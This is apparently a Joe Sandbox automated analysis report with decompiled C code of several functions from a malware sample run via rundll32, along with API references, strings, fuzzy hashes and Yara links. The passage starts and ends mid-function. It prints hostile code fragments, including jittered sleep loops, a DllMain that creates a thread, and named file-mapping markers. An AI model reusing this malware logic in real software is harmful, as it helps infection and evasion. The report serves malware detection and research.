						_t175 = _v16;
						_t126 = E00A19A14(_t175, _a4, _a12, _a16); // executed
						_a20 = _t126;
						_t127 =  *((intOrPtr*)(_t175 + 8));
						 *((intOrPtr*)( *_t127 + 0x80))(_t127);
						_t129 =  *((intOrPtr*)(_t175 + 8));
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						_t131 =  *((intOrPtr*)(_t175 + 4));
						 *((intOrPtr*)( *_t131 + 8))(_t131);
						_t133 =  *_t175;
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						E00A1A07B(_t175);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t121 = _a12;
							if(_t121 != 0) {
								_t168 =  *_t121;
								_t173 =  *_a16;
								wcstombs( *_t121,  *_t121,  *_a16);
								_t124 = E00A16C66(_t168, _t168, _t173 >> 1);
								_t167 = _v20;
								 *_a16 = _t124;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00A1A07B(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00a190ba
0x00a190ba
0x00a190ba
0x00a190c3
0x00a190c8
0x00a190cf
0x00a190d1
0x00a190d1
0x00a190de
0x00a190e9
0x00a190ec
0x00a190f7
0x00a190fa
0x00a190ff
0x00a19102
0x00a19107
0x00a1910a
0x00a19116
0x00a19123
0x00a19125
0x00a1912b
0x00a19130
0x00a1913b
0x00a1913d
0x00a19140
0x00a19146
0x00a19148
0x00a19150
0x00a1915b
0x00a1915d
0x00a19160
0x00a19160
0x00a19162
0x00a19169
0x00a1916e
0x00a1917b
0x00a1917d
0x00a19182
0x00a1918a
0x00a1918d
0x00a19193
0x00a1919e
0x00a191a0
0x00a191a5
0x00a191aa
0x00a191ad
0x00a191b2
0x00a191bd
0x00a191bf
0x00a191c2
0x00a191c2
0x00a191c4
0x00a191cb
0x00a191ce
0x00a191d3
0x00a191dd
0x00a191df
0x00a191df
0x00a191e2
0x00a191f0
0x00a191f5
0x00a191f9
0x00a191fc
0x00a193d4
0x00a193dc
0x00a193e9
0x00a19202
0x00a1920e
0x00a19216
0x00a19219
0x00a193c4
0x00a193ce
0x00000000
0x00a193ce
0x00a19225
0x00a1922a
0x00a19233
0x00a19244
0x00a19248
0x00a19251
0x00a19257
0x00a19264
0x00a1926b
0x00a19274
0x00a1927a
0x00a193b4
0x00a193be
0x00000000
0x00a193be
0x00a19286
0x00a1928c
0x00a19291
0x00a19292
0x00a19299
0x00a192a0
0x00a192a3
0x00a193a6
0x00a193ae
0x00000000
0x00a193ae
0x00a192ac
0x00a192b2
0x00a192bb
0x00a192c4
0x00a192ca
0x00a192d1
0x00a192d8
0x00a192db
0x00a193ec
0x00a1938e
0x00a1938e
0x00a19393
0x00a1939e
0x00a193a4
0x00000000
0x00a193a4
0x00a192e5
0x00a192ec
0x00a192ef
0x00a192f4
0x00a192ff
0x00a19304
0x00a19307
0x00a1930d
0x00a19313
0x00a19319
0x00a1931c
0x00a19322
0x00a19325
0x00a1932a
0x00a1932e
0x00a1932e
0x00a1933a
0x00a19346
0x00a1934a
0x00a1934c
0x00a19351
0x00a19353
0x00a19358
0x00a1935d
0x00a1936a
0x00a19372
0x00a19375
0x00a19375
0x00a19351
0x00000000
0x00a1933c
0x00a19340
0x00a19377
0x00a1937a
0x00a19383
0x00000000
0x00000000
0x00000000
0x00000000
0x00a19383
0x00a19342
0x00000000
0x00a19342
0x00a1933a

APIs

GetTickCount.KERNEL32 ref: 00A190D1
wsprintfA.USER32 ref: 00A1911E
wsprintfA.USER32 ref: 00A1913B
wsprintfA.USER32 ref: 00A1915B
wsprintfA.USER32 ref: 00A19179
wsprintfA.USER32 ref: 00A1919C
wsprintfA.USER32 ref: 00A191BD
wsprintfA.USER32 ref: 00A191DD
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A1920E
GetTickCount.KERNEL32 ref: 00A1921F
RtlEnterCriticalSection.NTDLL(054895F0), ref: 00A19233
RtlLeaveCriticalSection.NTDLL(054895F0), ref: 00A19251

Part of subcall function 00A149EC: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A17
Part of subcall function 00A149EC: lstrlen.KERNEL32(00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A1F
Part of subcall function 00A149EC: strcpy.NTDLL ref: 00A14A36
Part of subcall function 00A149EC: lstrcat.KERNEL32(00000000,00000000), ref: 00A14A41
Part of subcall function 00A149EC: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A13E0F,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A5E

StrTrimA.SHLWAPI(00000000,00A1C2C4,?,05489630), ref: 00A19286

Part of subcall function 00A19FA4: lstrlen.KERNEL32(00A13E46,00000000,00000000,00A13E46,0053002F,00000000), ref: 00A19FB0
Part of subcall function 00A19FA4: lstrlen.KERNEL32(?), ref: 00A19FB8
Part of subcall function 00A19FA4: lstrcpy.KERNEL32(00000000,?), ref: 00A19FCF
Part of subcall function 00A19FA4: lstrcat.KERNEL32(00000000,?), ref: 00A19FDA

lstrcpy.KERNEL32(00000000,?), ref: 00A192B2
lstrcat.KERNEL32(00000000,?), ref: 00A192C4
lstrcat.KERNEL32(00000000,00000000), ref: 00A192CA

Part of subcall function 00A18DEA: lstrlen.KERNEL32(?,00A1D2E0,747C7FC0,00000000,00A13FBD,?,?,?,?,?,00A19865,?), ref: 00A18DF3
Part of subcall function 00A18DEA: mbstowcs.NTDLL ref: 00A18E1A
Part of subcall function 00A18DEA: memset.NTDLL ref: 00A18E2C

wcstombs.NTDLL ref: 00A1935D

Part of subcall function 00A19A14: SysAllocString.OLEAUT32(00000000), ref: 00A19A55

Part of subcall function 00A1A07B: HeapFree.KERNEL32(00000000,00000000,00A18705,00000000,?,?,00000000,?,?,?,?,?,?,00A12540,00000000), ref: 00A1A087

HeapFree.KERNEL32(00000000,?,00000000), ref: 00A1939E
HeapFree.KERNEL32(00000000,00000000,0053002F,00000000), ref: 00A193AE
HeapFree.KERNEL32(00000000,00000000,?,05489630), ref: 00A193BE
HeapFree.KERNEL32(00000000,?), ref: 00A193CE
HeapFree.KERNEL32(00000000,?), ref: 00A193DC

Strings

Uxt, xrefs: 00A1939E, 00A193AE, 00A193BE, 00A193CE, 00A193DC

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Uxt
API String ID: 972889839-1536154274
Opcode ID: c226b656535fbb2cc5644b377f39f179ec0c02c8e2e386ec2b954f1dca9a3edd
Instruction ID: 45c825909f2dfb65174058dc566ab8ba34f6708e0ab60a7de19a6a29feea414e
Opcode Fuzzy Hash: c226b656535fbb2cc5644b377f39f179ec0c02c8e2e386ec2b954f1dca9a3edd
Instruction Fuzzy Hash: D4A13971900219EFDB11DFA8DD88EEB3BA9FF48354B158425F859CB260D734D992CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A19C23, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00A19C23(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xa1d1f8);
					_v20 = 0;
					_v16 = 0;
					L00A1AEF0();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xa1d224; // 0x2dc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xa1d204 = 5;
						} else {
							_t69 = E00A14B22(); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xa1d218 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00A17790( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00A1259A(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xa1d1fc);
							goto L21;
						} else {
							__eflags =  *0xa1d200; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00A154F9();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xa1d200);
								L21:
								L00A1AEF0();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xa1d1f0, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00a19c23
0x00a19c35
0x00a19c38
0x00a19c44
0x00a19c4c
0x00a19c4f
0x00a19db5
0x00a19c55
0x00a19c55
0x00a19c57
0x00a19c5c
0x00a19c5d
0x00a19c63
0x00a19c66
0x00a19c69
0x00a19c77
0x00a19c82
0x00a19c85
0x00a19c87
0x00a19c94
0x00a19c9e
0x00a19ca2
0x00a19ca5
0x00a19caa
0x00a19cb5
0x00a19cb5
0x00a19cac
0x00a19cac
0x00a19cb3
0x00000000
0x00000000
0x00a19cb3
0x00a19cbf
0x00000000
0x00a19cc2
0x00a19cc6
0x00a19cd1
0x00a19cd1
0x00a19cd8
0x00a19cdd
0x00a19ce4
0x00a19ced
0x00a19cf3
0x00a19cf6
0x00a19cfd
0x00a19d00
0x00000000
0x00000000
0x00a19d02
0x00a19d05
0x00a19d08
0x00a19d0b
0x00000000
0x00a19d0d
0x00a19d1c
0x00a19d1c
0x00000000
0x00a19d4a
0x00a19d4a
0x00a19d4f
0x00a19d6e
0x00a19d70
0x00a19d75
0x00a19d76
0x00000000
0x00a19d51
0x00a19d51
0x00a19d57
0x00000000
0x00a19d59
0x00a19d59
0x00a19d5e
0x00a19d60
0x00a19d65
0x00a19d66
0x00a19d7c
0x00a19d7c
0x00a19d84
0x00a19d8f
0x00a19d92
0x00a19d9d
0x00a19d9f
0x00a19da1
0x00a19da4
0x00000000
0x00a19daa
0x00000000
0x00a19daa
0x00a19da4
0x00a19d57
0x00000000
0x00a19d4f
0x00a19d1f
0x00a19d21
0x00a19d24
0x00a19d25
0x00a19d25
0x00a19d29
0x00a19d33
0x00a19d33
0x00a19d39
0x00a19d3c
0x00a19d3c
0x00a19d42
0x00a19d42
0x00a19dbf
0x00000000

APIs

memset.NTDLL ref: 00A19C38
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A19C44
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A19C69
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A19C85
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A19C9E
HeapFree.KERNEL32(00000000,00000000), ref: 00A19D33
CloseHandle.KERNEL32(?), ref: 00A19D42
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A19D7C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A17299), ref: 00A19D92
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A19D9D

Part of subcall function 00A14B22: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05489328,00000000,?,747DF710,00000000,747DF730), ref: 00A14B71
Part of subcall function 00A14B22: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05489360,?,00000000,30314549,00000014,004F0053,0548931C), ref: 00A14C0E
Part of subcall function 00A14B22: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A19CB1), ref: 00A14C20

GetLastError.KERNEL32 ref: 00A19DAF

Strings

Uxt, xrefs: 00A19D33

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uxt
API String ID: 3521023985-1536154274
Opcode ID: 6666981c770470cc01f3f62146b6d5db9a9252bf5eb928e29a71e845822c46e5
Instruction ID: 5ddafb2c9d5f78ef78bfc5b83bfbe6c7c0bbf3ebc2ffe6e0d97adc7c75122561
Opcode Fuzzy Hash: 6666981c770470cc01f3f62146b6d5db9a9252bf5eb928e29a71e845822c46e5
Instruction Fuzzy Hash: 9D512871801229EEDF10DFD4DD449EFBFB9EF09360F208226F525A6290D7749A85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41DBD, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E6FC41DBD(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6FC42150();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6fc44150;
				_push(_t15 + 0x6fc4505e);
				_push(_t15 + 0x6fc45054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6FC4214A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6fc44140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6fc41dbd
0x6fc41dc6
0x6fc41dca
0x6fc41dd0
0x6fc41dd5
0x6fc41dda
0x6fc41ddd
0x6fc41de0
0x6fc41de5
0x6fc41de6
0x6fc41de9
0x6fc41df4
0x6fc41dfb
0x6fc41dff
0x6fc41e01
0x6fc41e02
0x6fc41e05
0x6fc41e0a
0x6fc41e14
0x6fc41e16
0x6fc41e16
0x6fc41e2a
0x6fc41e30
0x6fc41e34
0x6fc41e84
0x6fc41e36
0x6fc41e3f
0x6fc41e55
0x6fc41e5d
0x6fc41e6f
0x6fc41e73
0x00000000
0x00000000
0x6fc41e5f
0x6fc41e62
0x6fc41e67
0x6fc41e69
0x6fc41e69
0x6fc41e4a
0x6fc41e4c
0x6fc41e75
0x6fc41e76
0x6fc41e76
0x6fc41e3f
0x6fc41e8c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,6FC411EF,0000000A,?), ref: 6FC41DCA
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6FC41DE0
_snwprintf.NTDLL ref: 6FC41E05
CreateFileMappingW.KERNELBASE(000000FF,6FC44140,00000004,00000000,?,?), ref: 6FC41E2A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6FC411EF,0000000A), ref: 6FC41E41
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6FC41E55
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6FC411EF,0000000A), ref: 6FC41E6D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6FC411EF), ref: 6FC41E76
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6FC411EF,0000000A), ref: 6FC41E7E

Strings

Axt, xrefs: 6FC41E2A

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Axt
API String ID: 1724014008-3934888026
Opcode ID: d0d3eb49b896bfa7e72d47ac257c02d129fdff34447e4b5ba38b32275e07d61a
Instruction ID: c908633a618ae3f57a224933f10003bc6f6abca75c6c53ab3cf8e46ecad6b4b7
Opcode Fuzzy Hash: d0d3eb49b896bfa7e72d47ac257c02d129fdff34447e4b5ba38b32275e07d61a
Instruction Fuzzy Hash: E92180B6600108FFDB12AFACCC89EDE77B9FB89360F104126F615D7180E730A9598B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A124C2, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00A124C2(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xa1d1f0 = _t14;
				if(_t14 != 0) {
					 *0xa1d160 = GetTickCount();
					_t16 = E00A14CF4(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00A1B04E();
						_t40 = _t18 + _t20;
						_t22 = E00A185F0(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xa1d20c; // 0x2e0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xa1d218 = 1; // executed
						}
					}
					_t16 = E00A1707F(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00a124c2
0x00a124d7
0x00a124df
0x00a124e4
0x00a124f7
0x00a124fc
0x00a12503
0x00a1258b
0x00a12591
0x00000000
0x00000000
0x00000000
0x00a12509
0x00a12509
0x00a1250e
0x00a12514
0x00a1251a
0x00a12524
0x00a12528
0x00a12529
0x00a1252e
0x00a1252f
0x00a12530
0x00a12535
0x00a1253b
0x00a12544
0x00a1254a
0x00a12550
0x00a12555
0x00a1255c
0x00a12560
0x00a12568
0x00a12570
0x00a12572
0x00a12572
0x00a1257a
0x00a1257c
0x00a1257c
0x00a1257a
0x00a12586
0x00000000
0x00a12586
0x00a124e8
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00A124D7
GetTickCount.KERNEL32 ref: 00A124EE
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00A1250E
SwitchToThread.KERNEL32(?,00000001), ref: 00A12514
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00A12530
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00A1254A
IsWow64Process.KERNEL32(000002E0,?,?,00000001), ref: 00A12568

Strings

7R\, xrefs: 00A124F7
Txt, xrefs: 00A124D7
PWxt, xrefs: 00A12568

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: 7R\$PWxt$Txt
API String ID: 3690864001-4099149646
Opcode ID: d72336e6497e64388c8e1a0b08f38c9323bda2f8d35c596a8087a6361ae5af1e
Instruction ID: c2060271667bc4521ee521a33bb50fed5848f64484af794490cce9840daddfef
Opcode Fuzzy Hash: d72336e6497e64388c8e1a0b08f38c9323bda2f8d35c596a8087a6361ae5af1e
Instruction Fuzzy Hash: C321D2B2A40305AFD310EFA5DC89BEA77A9FB48370F00892DF555C6150E778DD848B61

Uniqueness

Uniqueness Score: -1.00%

Function 6FC4146A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6fc44108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6fc4410c;
						if( *0x6fc4410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6fc44118;
								if( *0x6fc44118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6fc4410c);
						}
						HeapDestroy( *0x6fc44110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6fc44108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6fc44110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6fc44130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E6FC4154A, E6FC41413(_a12, 0, 0x6fc44118, _t41), 0,  &_a8); // executed
							 *0x6fc4410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6fc4146d
0x6fc41479
0x6fc4147b
0x6fc4147e
0x6fc414f8
0x6fc414fe
0x6fc41500
0x6fc41502
0x6fc41508
0x6fc4150a
0x6fc4150f
0x6fc41512
0x6fc4151d
0x6fc4151f
0x00000000
0x00000000
0x6fc41521
0x6fc41524
0x6fc41526
0x00000000
0x00000000
0x00000000
0x6fc41526
0x6fc4152e
0x6fc4152e
0x6fc4153a
0x6fc4153a
0x6fc41480
0x6fc41481
0x6fc414a1
0x6fc414a7
0x6fc414a9
0x6fc414ae
0x6fc414ee
0x6fc414ee
0x6fc414b0
0x6fc414b8
0x6fc414bf
0x6fc414d8
0x6fc414e0
0x6fc414e5
0x6fc414ea
0x00000000
0x6fc414ea
0x6fc414e5
0x6fc414ae
0x6fc41481
0x6fc41547

APIs

InterlockedIncrement.KERNEL32(6FC44108), ref: 6FC4148C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6FC414A1
CreateThread.KERNEL32 ref: 6FC414D8
InterlockedDecrement.KERNEL32(6FC44108), ref: 6FC414F8
SleepEx.KERNEL32(00000064,00000001), ref: 6FC41512
CloseHandle.KERNEL32 ref: 6FC4152E
HeapDestroy.KERNEL32 ref: 6FC4153A

Strings

Txt, xrefs: 6FC414A1

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID: Txt
API String ID: 3416589138-4033135041
Opcode ID: 6eec9829f2153ee4503105f47273d6812fc76116cf9a15434fb65d613296e88e
Instruction ID: fe483fe3da48aef5d525c9aa010aecf746a26b09fcf593ac17cfc48d9d2f2297
Opcode Fuzzy Hash: 6eec9829f2153ee4503105f47273d6812fc76116cf9a15434fb65d613296e88e
Instruction Fuzzy Hash: B421C931900506EFCB01AF6DCC85A9977B4FBA27717204125FA62D7150F7309934EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A16D4A, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00A16D4A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00A1AEEA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xa1d230; // 0x4a6a5a8
				_t5 = _t13 + 0xa1e84d; // 0x5488df5
				_t6 = _t13 + 0xa1e580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00A1AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0xa1d234, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00a16d4a
0x00a16d52
0x00a16d56
0x00a16d5c
0x00a16d61
0x00a16d66
0x00a16d69
0x00a16d6c
0x00a16d71
0x00a16d72
0x00a16d75
0x00a16d7a
